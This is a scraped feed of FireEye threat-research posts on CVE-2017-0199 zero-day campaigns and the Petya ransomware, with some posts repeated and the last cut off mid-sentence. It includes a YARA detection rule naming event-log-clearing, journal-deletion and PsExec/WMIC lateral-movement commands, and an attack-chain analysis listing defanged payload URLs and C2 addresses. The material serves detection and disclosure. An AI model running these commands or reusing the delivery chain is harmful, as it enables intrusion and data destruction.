"fireeye", "title": "CVE-2017-0199 Used as Zero Day to Distribute FINSPY Espionage Malware\nand LATENTBOT Cyber Crime Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199"], "modified": "2017-04-12T15:00:00", "id": "FIREEYE:9503F430A48297769A46076960747B2F", "href": "https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-08-31T00:18:21", "description": "_UPDATE (July 21): FireEye continues to track this threat. An earlier version of this post has been updated to reflect new findings._\n\nOn June 27, 2017, multiple organizations \u2013 many in Europe \u2013 reported [significant disruptions](<https://www.theguardian.com/world/2017/jun/27/petya-ransomware-attack-strikes-companies-across-europe>) they are attributing to a variant of the Petya ransomware, which we are calling \u201cEternalPetya\u201d. The malware was initially distributed through a compromised software update system and then self-propagated through stolen credentials and SMB exploits, including the [EternalBlue exploit](<https://www.fireeye.com/blog/threat-research/2017/05/smb-exploited-wannacry-use-of-eternalblue.html>) used in the [WannaCry](<https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html>) attack from May 2017.\n\nThe initial infection vector for this campaign was a [poisoned update for the MeDoc software suite](<http://www.zdnet.com/article/six-quick-facts-june-global-ransomware-cyberattack/>), a software package used by many Ukrainian organizations. The timing of a MeDoc software update, which occurred on June 27, is consistent with initial reporting of the ransomware attack, and the timing correlates to lateral movement via PSExec we observed in victim networks starting around 10:12 UTC. Additionally, the MeDoc website had displayed a warning message in Russian stating: \"On our servers is occurring a virus attack. Our apologies for the temporary inconvenience!\"\n\nOur analysis of the artifacts and network traffic at victim networks indicate that modified versions of the EternalBlue and EternalRomance SMB exploits were used, at least in part, to spread laterally. However, much of the propagation is believed to have occurred by the malware\u2019s use of WMI commands, MimiKatz, and PSExec.\n\nFireEye has confirmed the following two samples related to this attack:\n\n * 71b6a493388e7d0b40c83ce903bc6b04\n * e285b6ce047015943e685e6638bd837e\n\nFireEye mobilized a Community Protection Event to investigate the threat activity and protect customer environments.\n\nWhile FireEye detection leverages behavioral analysis of malicious techniques, our team has created a YARA rule to assist organizations in retroactively searching their environments for this malware, as well as detecting future activity. Our team has focused on the malicious attacker techniques that are core to the operation of the malware: SMB drive usage, ransom demand language, the underlying functions and APIs, and the system utilities used for lateral movement. The thresholds can be modified in the condition section that follows.\n\nrule CPE_MS17_010_RANSOMWARE { \nmeta:version=\"1.1\" \n//filetype=\"PE\" \nauthor=\"[Ian.Ahl@fireeye.com](<mailto:Ian.Ahl@fireeye.com>) @TekDefense, [Nicholas.Carr@mandiant.com](<mailto:Nicholas.Carr@mandiant.com>) @ItsReallyNick\" \ndate=\"2017-06-27\" \ndescription=\"Probable PETYA ransomware using ETERNALBLUE, WMIC, PsExec\" \nstrings: \n// DRIVE USAGE \n$dmap01 = \"\\\\\\\\\\\\\\\\.\\\\\\PhysicalDrive\" nocase ascii wide \n$dmap02 = \"\\\\\\\\\\\\\\\\.\\\\\\PhysicalDrive0\" nocase ascii wide \n$dmap03 = \"\\\\\\\\\\\\\\\\.\\\\\\C:\" nocase ascii wide \n$dmap04 = \"TERMSRV\" nocase ascii wide \n$dmap05 = \"\\\\\\admin$\" nocase ascii wide \n$dmap06 = \"GetLogicalDrives\" nocase ascii wide \n$dmap07 = \"GetDriveTypeW\" nocase ascii wide\n\n// RANSOMNOTE \n$msg01 = \"WARNING: DO NOT TURN OFF YOUR PC!\" nocase ascii wide \n$msg02 = \"IF YOU ABORT THIS PROCESS\" nocase ascii wide \n$msg03 = \"DESTROY ALL OF YOUR DATA!\" nocase ascii wide \n$msg04 = \"PLEASE ENSURE THAT YOUR POWER CABLE IS PLUGGED\" nocase ascii wide \n$msg05 = \"your important files are encrypted\" ascii wide \n$msg06 = \"Your personal installation key\" nocase ascii wide \n$msg07 = \"worth of Bitcoin to following address\" nocase ascii wide \n$msg08 = \"CHKDSK is repairing sector\" nocase ascii wide \n$msg09 = \"Repairing file system on \" nocase ascii wide \n$msg10 = \"Bitcoin wallet ID\" nocase ascii wide \n$msg11 = \"[wowsmith123456@posteo.net](<mailto:wowsmith123456@posteo.net>)\" nocase ascii wide \n$msg12 = \"1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX\" nocase ascii wide \n$msg_pcre = /(en|de)crypt(ion|ed\\\\.)/ \n\n// FUNCTIONALITY, APIS \n$functions01 = \"need dictionary\" nocase ascii wide \n$functions02 = \"comspec\" nocase ascii wide \n$functions03 = \"OpenProcessToken\" nocase ascii wide \n$functions04 = \"CloseHandle\" nocase ascii wide \n$functions05 = \"EnterCriticalSection\" nocase ascii wide \n$functions06 = \"ExitProcess\" nocase ascii wide \n$functions07 = \"GetCurrentProcess\" nocase ascii wide \n$functions08 = \"GetProcAddress\" nocase ascii wide \n$functions09 = \"LeaveCriticalSection\" nocase ascii wide \n$functions10 = \"MultiByteToWideChar\" nocase ascii wide \n$functions11 = \"WideCharToMultiByte\" nocase ascii wide \n$functions12 = \"WriteFile\" nocase ascii wide \n$functions13 = \"CoTaskMemFree\" nocase ascii wide \n$functions14 = \"NamedPipe\" nocase ascii wide \n$functions15 = \"Sleep\" nocase ascii wide // imported, not in strings \n\n// COMMANDS \n// -- Clearing event logs & USNJrnl \n$cmd01 = \"wevtutil cl Setup\" ascii wide nocase \n$cmd02 = \"wevtutil cl System\" ascii wide nocase \n$cmd03 = \"wevtutil cl Security\" ascii wide nocase \n$cmd04 = \"wevtutil cl Application\" ascii wide nocase \n$cmd05 = \"fsutil usn deletejournal\" ascii wide nocase \n// -- Scheduled task \n$cmd06 = \"schtasks \" nocase ascii wide \n$cmd07 = \"/Create /SC \" nocase ascii wide \n$cmd08 = \" /TN \" nocase ascii wide \n$cmd09 = \"at %02d:%02d %ws\" nocase ascii wide \n$cmd10 = \"shutdown.exe /r /f\" nocase ascii wide \n// -- Sysinternals/PsExec and WMIC \n$cmd11 = \"-accepteula -s\" nocase ascii wide \n$cmd12 = \"wmic\" \n$cmd13 = \"/node:\" nocase ascii wide \n$cmd14 = \"process call create\" nocase ascii wide\n\ncondition: \n// (uint16(0) == 0x5A4D) \n3 of ($dmap*) \nand 2 of ($msg*) \nand 9 of ($functions*) \nand 7 of ($cmd*) \n} \n \n--- \n \nFireEye has read reports that the malware is spread by an email lure containing a malicious Office document attachment or links to infected documents exploiting CVE-2017-0199. We are confident that this document is unrelated to the current outbreak of activity, and we have seen no other indicators that CVE-2017-0199 is related. While FireEye detects these campaigns, we have not observed any correlation with known victims of the Petya attacks.\n\n#### Implications\n\nThis activity highlights the importance of organizations securing their systems against SMB exploits and ransomware infections. [Microsoft has provided a guide](<https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>) for securing Windows systems against the EternalBlue exploit in the context of the WannaCry ransomware. A robust back-up strategy, network segmentation and air gapping where appropriate, and other defenses against ransomware can help organizations defend against ransomware distribution operations and quickly remediate infections.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-06-27T17:30:00", "type": "fireeye", "title": "Petya Destructive Malware Variant Spreading via Stolen Credentials and EternalBlue Exploit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199"], "modified": "2017-06-27T17:30:00", "id": "FIREEYE:92F27B3F6B5FC8C7C22B088678232819", "href": "https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:18:22", "description": "FireEye recently identified a vulnerability \u2013 CVE-2017-0199 \u2013 that allows a malicious actor to download and execute a Visual Basic script containing PowerShell commands when a user opens a Microsoft Office RTF document containing an embedded exploit. We worked with Microsoft and [published the technical details of this vulnerability](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>) as soon as a patch was made available.\n\nIn this follow-up post, we discuss some of the campaigns we observed leveraging the CVE-2017-0199 zero-day in the days, weeks and months leading up to the patch being released.\n\n#### CVE-2017-0199 Used by Multiple Actors\n\nFireEye assesses with moderate confidence that CVE-2017-0199 was leveraged by financially motivated and nation-state actors prior to its disclosure. Actors leveraging FINSPY and LATENTBOT used the zero-day as early as January and March, and similarities between their implementations suggest they obtained exploit code from a shared source. Recent DRIDEX activity began following a disclosure on April 7, 2017.\n\n#### FINSPY Malware Used to Target Russian-Speaking Victims\n\nAs early as Jan. 25, 2017, lure documents referencing a Russian Ministry of Defense decree and a manual allegedly published in the \"Donetsk People's Republic\" exploited CVE-2017-0199 to deliver FINSPY payloads. Though we have not identified the targets, FINSPY is sold by Gamma Group to multiple nation-state clients, and we assess with moderate confidence that it was being used along with the zero-day to carry out cyber espionage.\n\nThe malicious document, \u0421\u041f\u0423\u0422\u041d\u0418\u041a \u0420\u0410\u0417\u0412\u0415\u0414\u0427\u0418\u041a\u0410.doc (MD5: c10dabb05a38edd8a9a0ddda1c9af10e), is a weaponized version of a widely available military training manual (Figure 1). Notably, this version purports to have been published in the \u201cDonetsk People's Republic,\u201d the name given to territory controlled by anti-Kyiv rebels in Eastern Ukraine.\n\nThe initial malicious document downloaded further payloads, including malware and a decoy document from 95.141.38.110. This site was open indexed to allow recovery of additional lure content, including prikaz.doc (MD5: 0F2B7068ABFF00D01CA7E64589E5AFD9), which claims to be a Russian Ministry of Defense decree approving a forest management plan.\n\nPer a 2015 [report](<https://citizenlab.org/2015/10/mapping-finfishers-continuing-proliferation/>) from CitizenLab, Gamma Group licenses their software to clients and each client uses unique infrastructure, making it likely that the two documents are being used by a single client.\n\nFINSPY malware is sold by Gamma Group, an Anglo-German \u201clawful intercept\u201d company. Gamma Group works on behalf of numerous nation-state clients, limiting insight into the ultimate sponsor of the activity. The FINSPY malware was heavily obfuscated, preventing the extraction of command and control (C2) information.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/MSFT%200day/Fig1b.png)\n\nFigure 1: FINSPY Lure Purporting to be Russian Military Manual\n\n#### CVE-2017-0199 Used to Distribute LATENTBOT\n\nAs early as March 4, 2017, malicious documents exploiting CVE-2017-0199 were used to deliver the [LATENTBOT malware](<https://www.fireeye.com/blog/threat-research/2015/12/latentbot_trace_me.html>). The malware, which includes credential theft capability, has thus far only been observed by FireEye iSIGHT Intelligence in financially motivated threat activity. Additionally, generic lures used in this most recent campaign are consistent with methods employed by financially motivated actors.\n\nLATENTBOT is a modular and highly obfuscated type of malware first discovered by FireEye iSIGHT intelligence in December 2015. It is capable of a variety of functions, including credential theft, hard drive and data wiping, disabling security software, and remote desktop functionality. Recently, we observed LATENTBOT campaigns using Microsoft Word Intruder (MWI).\n\nThe lure documents distributing LATENTBOT malware used generic social engineering. The documents that were used are shown in Table 1, and all used 217.12.203.90 as a C2 domain.\n\n**File Name**\n\n| \n\n**MD5 Hash** \n \n---|--- \n \nhire_form.doc\n\n| \n\n5ebfd13250dd0408e3de594e419f9e01 \n \n!!!!URGENT!!!!READ!!!.doc\n\n| \n\n1b17ccf5109a9342b59bded31e1ffb18\n\n6e9483edacdc2b6f6ed45c526cf4cf7b \n \nPDP.doc\n\n| \n\n4a81b6ac8aa0f86719a574d7546d563f \n \ndocument.doc\n\n| \n\n65a558e9fe907dc5790e8a592364f64e \n \nTable 1: LATENTBOT Documents\n\nOn April 10, the actors altered their infrastructure to deliver TERDOT payloads instead of LATENTBOT. This TERDOT payload (MD5: e3b600a59eea9b2ea7a0d4e3c45074da) beacons to http://185.77.129.103/SBz1efFx/gt45gh.php, then downloads a Tor client and beacons to sudoofk3wgl2gmxm.onion.\n\n#### FINSPY and LATENTBOT Samples Share Origin\n\nShared artifacts in the FINSPY and LATENTBOT samples suggest the same builder was used to create both, indicating the zero-day exploit was supplied to both criminal and cyber espionage operations from the same source.\n\nMalicious documents used in both campaigns share a last revision time of: 2016-11-27 22:42:00 (Figure 2).\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/MSFT%200day/Fig2a.png)\n\nFigure 2: Revision Time Artifact Shared Between FINSPY and LATENTBOT Samples\n\n#### DRIDEX Spam Follows Recent Disclosure\n\nFollowing a disclosure of specifics related to the zero-day on April 7, 2017, the vulnerability was used in DRIDEX spam campaigns, which continue as of the publication of this blog. We cannot confirm the mechanism through which the actors obtained the exploit. These actors may have leveraged knowledge of the vulnerability gained through the disclosure, or been given access to it when it became clear that patching was imminent.\n\nA spam wave was sent out on April 10, 2017, leveraging a \u201cScan Data\u201d lure. The attached document leveraged CVE-2017-0199 to install DRIDEX on the victim\u2019s computer.\n\n#### Outlook and Implications\n\nThough only one FINSPY user has been observed leveraging this zero-day exploit, the historic scope of FINSPY, a capability used by several nation states, suggests other customers had access to it. Additionally, this incident exposes the global nature of cyber threats and the value of worldwide perspective \u2013 a cyber espionage incident targeting Russians can provide an opportunity to learn about and interdict crime against English speakers elsewhere.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-04-12T11:00:00", "type": "fireeye", "title": "CVE-2017-0199 Used as Zero Day to Distribute FINSPY Espionage Malware and LATENTBOT Cyber Crime Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199"], "modified": "2017-04-12T11:00:00", "id": "FIREEYE:E77EEC61CF4FE2F4BDB43A5A0C15A644", "href": "https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T01:19:31", "description": "_UPDATE (July 21): FireEye continues to track this threat. An earlier version of this post has been updated to reflect new findings._\n\nOn June 27, 2017, multiple organizations \u2013 many in Europe \u2013 reported [significant disruptions](<https://www.theguardian.com/world/2017/jun/27/petya-ransomware-attack-strikes-companies-across-europe>) they are attributing to a variant of the Petya ransomware, which we are calling \u201cEternalPetya\u201d. The malware was initially distributed through a compromised software update system and then self-propagated through stolen credentials and SMB exploits, including the [EternalBlue exploit](<https://www.fireeye.com/blog/threat-research/2017/05/smb-exploited-wannacry-use-of-eternalblue.html>) used in the [WannaCry](<https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html>) attack from May 2017.\n\nThe initial infection vector for this campaign was a [poisoned update for the MeDoc software suite](<http://www.zdnet.com/article/six-quick-facts-june-global-ransomware-cyberattack/>), a software package used by many Ukrainian organizations. The timing of a MeDoc software update, which occurred on June 27, is consistent with initial reporting of the ransomware attack, and the timing correlates to lateral movement via PSExec we observed in victim networks starting around 10:12 UTC. Additionally, the MeDoc website had displayed a warning message in Russian stating: \"On our servers is occurring a virus attack. Our apologies for the temporary inconvenience!\"\n\nOur analysis of the artifacts and network traffic at victim networks indicate that modified versions of the EternalBlue and EternalRomance SMB exploits were used, at least in part, to spread laterally. However, much of the propagation is believed to have occurred by the malware\u2019s use of WMI commands, MimiKatz, and PSExec.\n\nFireEye has confirmed the following two samples related to this attack:\n\n * 71b6a493388e7d0b40c83ce903bc6b04\n * e285b6ce047015943e685e6638bd837e\n\nFireEye mobilized a Community Protection Event to investigate the threat activity and protect customer environments.\n\nWhile FireEye detection leverages behavioral analysis of malicious techniques, our team has created a YARA rule to assist organizations in retroactively searching their environments for this malware, as well as detecting future activity. Our team has focused on the malicious attacker techniques that are core to the operation of the malware: SMB drive usage, ransom demand language, the underlying functions and APIs, and the system utilities used for lateral movement. The thresholds can be modified in the condition section that follows.\n\nrule CPE_MS17_010_RANSOMWARE { \nmeta:version=\"1.1\" \n//filetype=\"PE\" \nauthor=\"[Ian.Ahl@fireeye.com](<mailto:Ian.Ahl@fireeye.com>) @TekDefense, [Nicholas.Carr@mandiant.com](<mailto:Nicholas.Carr@mandiant.com>) @ItsReallyNick\" \ndate=\"2017-06-27\" \ndescription=\"Probable PETYA ransomware using ETERNALBLUE, WMIC, PsExec\" \nstrings: \n// DRIVE USAGE \n$dmap01 = \"\\\\\\\\\\\\\\\\.\\\\\\PhysicalDrive\" nocase ascii wide \n$dmap02 = \"\\\\\\\\\\\\\\\\.\\\\\\PhysicalDrive0\" nocase ascii wide \n$dmap03 = \"\\\\\\\\\\\\\\\\.\\\\\\C:\" nocase ascii wide \n$dmap04 = \"TERMSRV\" nocase ascii wide \n$dmap05 = \"\\\\\\admin$\" nocase ascii wide \n$dmap06 = \"GetLogicalDrives\" nocase ascii wide \n$dmap07 = \"GetDriveTypeW\" nocase ascii wide\n\n// RANSOMNOTE \n$msg01 = \"WARNING: DO NOT TURN OFF YOUR PC!\" nocase ascii wide \n$msg02 = \"IF YOU ABORT THIS PROCESS\" nocase ascii wide \n$msg03 = \"DESTROY ALL OF YOUR DATA!\" nocase ascii wide \n$msg04 = \"PLEASE ENSURE THAT YOUR POWER CABLE IS PLUGGED\" nocase ascii wide \n$msg05 = \"your important files are encrypted\" ascii wide \n$msg06 = \"Your personal installation key\" nocase ascii wide \n$msg07 = \"worth of Bitcoin to following address\" nocase ascii wide \n$msg08 = \"CHKDSK is repairing sector\" nocase ascii wide \n$msg09 = \"Repairing file system on \" nocase ascii wide \n$msg10 = \"Bitcoin wallet ID\" nocase ascii wide \n$msg11 = \"[wowsmith123456@posteo.net](<mailto:wowsmith123456@posteo.net>)\" nocase ascii wide \n$msg12 = \"1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX\" nocase ascii wide \n$msg_pcre = /(en|de)crypt(ion|ed\\\\.)/ \n\n// FUNCTIONALITY, APIS \n$functions01 = \"need dictionary\" nocase ascii wide \n$functions02 = \"comspec\" nocase ascii wide \n$functions03 = \"OpenProcessToken\" nocase ascii wide \n$functions04 = \"CloseHandle\" nocase ascii wide \n$functions05 = \"EnterCriticalSection\" nocase ascii wide \n$functions06 = \"ExitProcess\" nocase ascii wide \n$functions07 = \"GetCurrentProcess\" nocase ascii wide \n$functions08 = \"GetProcAddress\" nocase ascii wide \n$functions09 = \"LeaveCriticalSection\" nocase ascii wide \n$functions10 = \"MultiByteToWideChar\" nocase ascii wide \n$functions11 = \"WideCharToMultiByte\" nocase ascii wide \n$functions12 = \"WriteFile\" nocase ascii wide \n$functions13 = \"CoTaskMemFree\" nocase ascii wide \n$functions14 = \"NamedPipe\" nocase ascii wide \n$functions15 = \"Sleep\" nocase ascii wide // imported, not in strings \n\n// COMMANDS \n// -- Clearing event logs & USNJrnl \n$cmd01 = \"wevtutil cl Setup\" ascii wide nocase \n$cmd02 = \"wevtutil cl System\" ascii wide nocase \n$cmd03 = \"wevtutil cl Security\" ascii wide nocase \n$cmd04 = \"wevtutil cl Application\" ascii wide nocase \n$cmd05 = \"fsutil usn deletejournal\" ascii wide nocase \n// -- Scheduled task \n$cmd06 = \"schtasks \" nocase ascii wide \n$cmd07 = \"/Create /SC \" nocase ascii wide \n$cmd08 = \" /TN \" nocase ascii wide \n$cmd09 = \"at %02d:%02d %ws\" nocase ascii wide \n$cmd10 = \"shutdown.exe /r /f\" nocase ascii wide \n// -- Sysinternals/PsExec and WMIC \n$cmd11 = \"-accepteula -s\" nocase ascii wide \n$cmd12 = \"wmic\" \n$cmd13 = \"/node:\" nocase ascii wide \n$cmd14 = \"process call create\" nocase ascii wide\n\ncondition: \n// (uint16(0) == 0x5A4D) \n3 of ($dmap*) \nand 2 of ($msg*) \nand 9 of ($functions*) \nand 7 of ($cmd*) \n} \n \n--- \n \nFireEye has read reports that the malware is spread by an email lure containing a malicious Office document attachment or links to infected documents exploiting CVE-2017-0199. We are confident that this document is unrelated to the current outbreak of activity, and we have seen no other indicators that CVE-2017-0199 is related. While FireEye detects these campaigns, we have not observed any correlation with known victims of the Petya attacks.\n\n#### Implications\n\nThis activity highlights the importance of organizations securing their systems against SMB exploits and ransomware infections. [Microsoft has provided a guide](<https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>) for securing Windows systems against the EternalBlue exploit in the context of the WannaCry ransomware. A robust back-up strategy, network segmentation and air gapping where appropriate, and other defenses against ransomware can help organizations defend against ransomware distribution operations and quickly remediate infections.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-06-27T17:30:00", "type": "fireeye", "title": "Petya Destructive Malware Variant Spreading via Stolen Credentials and EternalBlue Exploit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199"], "modified": "2017-06-27T17:30:00", "id": "FIREEYE:4B85E44D28C8512270923B36728CBD59", "href": "https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-26T12:21:44", "description": "FireEye recently detected malicious Microsoft Office RTF documents that leverage CVE-2017-0199, a previously undisclosed vulnerability. This vulnerability allows a malicious actor to download and execute a Visual Basic script containing PowerShell commands when a user opens a document containing an embedded exploit. FireEye has observed Office documents exploiting CVE-2017-0199 that download and execute malware payloads from different well-known malware families.\n\nFireEye shared the details of the vulnerability with Microsoft and has been coordinating public disclosure timed with the release of a patch by Microsoft to address the vulnerability, which can be found [here.](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>)\n\nThe vulnerability bypassed most mitigations prior to patch availability; however, FireEye email and network products detected the malicious documents. FireEye recommends that Microsoft Office users apply the [patch from Microsoft](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>).\n\n#### Attack Scenario\n\nThe attack occurs in the following manner:\n\n 1. A threat actor emails a Microsoft Word document to a targeted user with an embedded OLE2 embedded link object\n 2. When the user opens the document, winword.exe issues a HTTP request to a remote server to retrieve a malicious HTA file\n 3. The file returned by the server is a fake RTF file with an embedded malicious script\n 4. Winword.exe looks up the file handler for application/hta through a COM object, which causes the Microsoft HTA application (mshta.exe) to load and execute the malicious script\n\nIn the two documents that FireEye observed prior to the [initial blog](<https://www.fireeye.com/blog/threat-research/2017/04/acknowledgement_ofa.html>) acknowledging these attacks, malicious scripts terminated the winword.exe processes, downloaded additional payloads, and loaded decoy documents. The original winword.exe process was terminated to conceal a user prompt generated by the OLE2link. Figure 1 shows this prompt.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/MSFT%200day/Fig1.png)\n\nFigure 1: User prompt hidden by the Visual Basic script\n\n#### Document 1 - (MD5: 5ebfd13250dd0408e3de594e419f9e01)\n\nThe first malicious document identified by FireEye had three stages. An embedded OLE2 link object causes winword.exe to reach out to the following URL to download the stage one malicious HTA file:\n\nhttp[:]//46.102.152[.]129/template.doc\n\nOnce downloaded, the malicious HTA file is processed by the \u201capplication/hta\u201d handler. The highlighted line in Figure 2 shows the first download occurring, followed by the additional malicious payloads.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/MSFT%200day/Fig2.png)\n\nFigure 2: Live attack scenario\n\nOnce downloaded, the template file was stored in the user\u2019s temporary internet files with the name template[?].hta, where [?] is determined at run time.\n\n#### The Logic Bug\n\nMshta.exe is responsible for handling the Content-Type \u201capplication/hta,\u201d parsing the content, and executing the script. Figure 3 shows winword.exe querying registry value of CLSID for the \u201capplication/hta\u201d handler.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/MSFT%200day/Fig3.png)\n\nFigure 3: Winword query registry value\n\nWinword.exe makes a request to the DCOMLaunch service, which in turn causes the svchost.exe process hosting DCOMLaunch to execute mshta.exe. Mshta.exe then executes the script embedded in the malicious HTA document. Figure 4 shows the deobfuscated VBScript from the first stage download.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/MSFT%200day/Fig4.png)\n\nFigure 4: First document, stage one VBScript\n\nThe script shown in Figure 4 performs the following malicious actions:\n\n 1. Terminates the winword.exe process with taskkill.exe to hide the prompt shown in Figure 1.\n 2. Downloads a VBScript file from http[:]//www.modani[.]com/media/wysiwyg/ww.vbs and saving it to %appdata%\\Microsoft\\Windows\\maintenance.vbs\n 3. Downloads a decoy document from http[:]//www.modani[.]com/media/wysiwyg/questions.doc and saving it to %temp%\\document.doc\n 4. Cleans up the Word Resiliency keys for Word versions 15.0 and 16.0 so that Microsoft Word will restart normally\n 5. Executes the malicious stage two VBScript: %appdata%\\Microsoft\\Windows\\maintenance.vbs\n 6. Opens the decoy document, %temp%\\document.doc, to hide the malicious activity from the user\n\nOnce executed, the downloaded stage two VBScript (ww.vbs/maintenance.vbs) performs the following actions:\n\n 1. Writes an embedded obfuscated script to %TMP%/eoobvfwiglhiliqougukgm.js\n 2. Executes the script\n\nThe obfuscated eoobvfwiglhiliqougukgm.js script performs the following actions when executed:\n\n 1. Attempts to delete itself from the system\n 2. Attempts to download http[:]//www.modani[.]com/media/wysiwyg/wood.exe (at most 44 times), and save the file to %TMP%\\dcihprianeeyirdeuceulx.exe\n 3. Executes %TMP%\\dcihprianeeyirdeuceulx.exe\n\nFigure 5 shows the process execution chain of events.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/MSFT%200day/Fig5.png)\n\nFigure 5: Process creation events\n\nThe final payload utilized in this malware is a newer variant of the LATENTBOT malware family. Additional details of the updates to this malware follow the Document 2 walkthrough.\n\nMD5\n\n| \n\nSize\n\n| \n\nName\n\n| \n\nDescription \n \n---|---|---|--- \n \n5ebfd13250dd0408e3de594e419f9e01\n\n| \n\n37,523\n\n| \n\nhire_form.doc\n\n| \n\nMalicious document \n \nfb475f0d8c8e9bf1bc360211179d8a28\n\n| \n\n27,429\n\n| \n\ntemplate.doc/template[?].hta\n\n| \n\nMalicious HTA file \n \n984658e34e634d56423797858a711846\n\n| \n\n5,704\n\n| \n\nww.vbs/maintenance.vbs\n\n| \n\nStage two VBScript \n \n73bf8647920eacc7cc377b3602a7ee7a\n\n| \n\n13,386\n\n| \n\nquestions.doc/document.doc\n\n| \n\nDecoy document \n \n11fb87888bbb4dcea4891ab856ac1c52\n\n| \n\n5,292\n\n| \n\neoobvfwiglhiliqougukgm.js\n\n| \n\nMalicious script \n \na1faa23a3ef8cef372f5f74aed82d2de | \n\n388,096\n\n| \n\nwood.exe/ dcihprianeeyirdeuceulx.exe\n\n| \n\nFinal payload \n \n15e51cdbd938545c9af47806984b1667\n\n| \n\n414,720\n\n| \n\nwood.exe/ dcihprianeeyirdeuceulx.exe\n\n| \n\nUpdated final payload \n \nTable 1: First document file metadata\n\n#### The LATENTBOT Payload\n\nThe payload associated with the first document is an updated 